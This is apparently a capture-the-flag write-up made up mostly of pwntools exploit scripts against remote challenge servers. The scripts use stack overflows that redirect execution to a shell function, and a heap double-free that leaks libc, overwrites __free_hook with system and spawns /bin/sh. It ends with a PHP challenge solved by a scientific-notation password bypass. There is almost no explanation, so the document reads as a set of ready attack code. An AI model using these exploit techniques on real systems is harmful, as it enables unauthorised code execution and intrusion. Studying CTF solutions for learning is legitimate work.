M78
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
p = remote("39.96.88.40",7010)
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf = ELF("./M78")
p.sendlineafter('?','1')
p.recvuntil("building\n")
p.send('a'*25)
p.recvuntil("password\n")
payload = 'b'*(0x18+0x4)+p32(0x08049202)
payload = payload.ljust(0x107,'a')
p.send(payload)
p.interactive()
|
game
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| from pwn import *
context.log_level = "debug"
context.terminal = ['tmux','sp','-h']
p = remote("39.96.88.40",7040)
payload = 'a'*36
payload += p64(0)
num = [55,15,82,1,0x62,0x44,0x43,0xf,0x56,0x3]
p.recvuntil("is :")
p.send(payload)
for i in num:
p.recvuntil(":")
p.sendline(str(i))
p.interactive()
|
Box
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
| from pwn import *
context.terminal=['tmux','sp','-h']
p = remote("39.96.88.40",7020)
libc = ELF("./libc.so.6")
elf = ELF("./pwn")
def add(id,size,content='a'):
p.sendlineafter(">> ",'1')
p.sendlineafter(":\n",str(id))
p.sendlineafter(":\n",str(size))
p.sendafter(":\n",content)
def show(id):
p.sendlineafter(">> ",'4')
p.sendlineafter(":\n",str(id))
def delete(id):
p.sendlineafter(">> ",'3')
p.sendlineafter(":\n",str(id))
def edit(id,content):
p.sendlineafter(">> ",'2')
p.sendlineafter(":\n",str(id))
p.sendafter(":\n",content)
add(0,0x200)
add(1,0x68)
for _ in range(7):
delete(0)
delete(0)
show(0)
leak_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96
log.info("main_arean:"+hex(leak_addr))
libc_base = leak_addr - 0x3ebc40
log.info("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.sym['system']
log.info("system_addr:"+hex(system_addr))
free_hook = libc_base + libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))
binsh_str = libc_base + libc.search('/bin/sh').next()
delete(1)
delete(1)
add(2,0x68,p64(free_hook))
add(3,0x68,"/bin/sh\x00")
add(4,0x68,p64(system_addr))
delete(3)
p.interactive()
|
碰碰碰
爆破 canary ,主办方下架了题目
Num
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
p = remote("39.96.88.40",7030)
elf = ELF("./NUM")
p.recvuntil("?\n")
p.sendline(str(10))
p.recvuntil("NUM\n")
for i in range(10):
sleep(0.2)
p.sendline(str(i))
shell = 0x080491B2
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(112+4+16))
p.recvuntil(':\n')
p.sendline(str(0xb2))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(113+4+16))
p.recvuntil(':\n')
p.sendline(str(0x91))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(114+4+16))
p.recvuntil(':\n')
p.sendline(str(0x04))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(115+4+16))
p.recvuntil(':\n')
p.sendline(str(0x08))
p.sendline(str(5))
p.interactive()
|
Web01
源码泄露:http://39.96.91.106:7040/code/code.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <?php
<p>code.txt</p>
if (isset ($_GET['password'])) {
if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
{
echo '<p>You password must be alphanumeric</p>';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '*-*') !== FALSE)
{
die('Flag: ' . $flag);
}
else
{
echo('<p>*-* have not been found</p>');
}
}
else
{
echo '<p>Invalid password</p>';
}
}
?>
|
if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE) 正则匹配检查无论如何都不会进入,因为 preg_match 的返回值是 int 0 用绝对等于 FALSE 是不相等的,FALSE 是 bool 型。
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999) 用科学计数法绕过,然后再加上*-*
exp
1
| http://39.96.91.106:7040/?password=2e9*-*
|
